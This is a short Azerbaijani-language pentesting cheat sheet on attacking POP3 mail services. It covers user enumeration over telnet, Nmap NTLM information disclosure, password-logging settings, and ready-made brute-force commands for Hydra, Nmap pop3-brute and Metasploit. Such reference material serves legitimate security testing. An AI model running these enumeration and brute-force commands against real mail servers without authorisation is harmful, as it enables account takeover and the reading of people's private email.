110,995-Pentesting POP

Post Office Protocol (POP) kompüter şəbəkəsi və İnternet standart protokolunun bir növüdür ki, ana maşın tərəfindən daxil olmaq üçün uzaq poçt serverindən e-poçtu çıxarır və götürür. POP, son istifadəçilərə e-poçt almaq və qəbul etmək imkanı verən OSI modelində tətbiq səviyyəsinin protokoludur.

Default portlar: 110, 995(ssl)

Telnet vasitəsilə serverə qoşulmaq üçün:

İstifadəçi enumeration:

+OK = exists

ERR = doesn’t exist

USER billydean

İstifadəçi adı və onun parolu əldə edildikdən sonra, e-poçtlara daxil olmaq və onları oxumaq mümkündür, çünki POP3 e-poçtları əldə etmək üçün nəzərdə tutulan bir protokoldur.

USER = username
PASS = password

Nmap əmri ilə məlumatın əldə edilməsi:

nmap -p 110,995 –script pop3-capabilities 10.10.10.51
script pop3-ntlm-info

Bu skript NTLM autentifikasiyası aktivləşdirilmiş uzaq POP3 xidmətlərindən məlumatları sadalayır.

Null etimadnaməsi ilə POP3 NTLM identifikasiyası sorğusunun göndərilməsi uzaq xidmətin NetBIOS, DNS və ƏS qurma versiyasını ehtiva edən məlumatları açıqlayan NTLMSSP mesajı ilə cavab verməyə səbəb olacaq.

POP sintaksisi

USER uid           "uid" kimi daxil olun
  PASS password      Həqiqi parolunuzu "parol" ilə əvəz edin
  STAT               Mesajların siyahısı, ümumi poçt qutusu ölçüsü
  LIST               Mesajları və ölçüləri sadalayın
  RETR n             Mesajı göstər 
  DELE n             Mesajı silmək üçün qeyd edin
  RSET               İstənilən dəyişikliyi ləğv edin
  QUIT               Çıxış (RSET olmadıqda mesajları silir)
  TOP msg n          Mesaj nömrəsi mesajının ilk n sətirini göstərin

Təhlükə yarada biləcək konfiqurasiyalar

Setting
Description

auth_debug

Bütün autentifikasiya sazlama qeydini aktivləşdirir.

auth_debug_passwords

Bu parametr jurnalın təfərrüatlılığını, təqdim edilmiş parolları tənzimləyir və sxem daxil edilir.

auth_verbose

Uğursuz autentifikasiya cəhdlərini və onların səbəblərini qeyd edir.

auth_verbose_passwords

Doğrulama üçün istifadə edilən parollar qeyd olunur və həmçinin kəsilə bilər.

auth_anonymous_username

Bu, ANONYMOUS SASL mexanizmi ilə daxil olarkən istifadə ediləcək istifadəçi adını müəyyən edir.

Hydra ilə Brute Force hücumu

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
hydra -t 2 -L users.list -P passwords.list -M 10.10.x.x.list -s 110 pop3

Msfconsole və Nmap ilə brute force hücumu

Nmap: pop3-brute –script-args userdb=users.list,passdb=passwords.list
nmap --script pop3-brute --script-args pop3loginmethod=SASL-LOGIN -p T:110 IP
nmap --script pop3-brute --script-args pop3loginmethod=SASL-CRAM-MD5 -p T:110 IP
nmap --script pop3-brute --script-args pop3loginmethod=APOP -p T:110 IP

msf > use auxiliary/scanner/pop3/pop3_login #MetasploitFramework

Last updated

Was this helpful?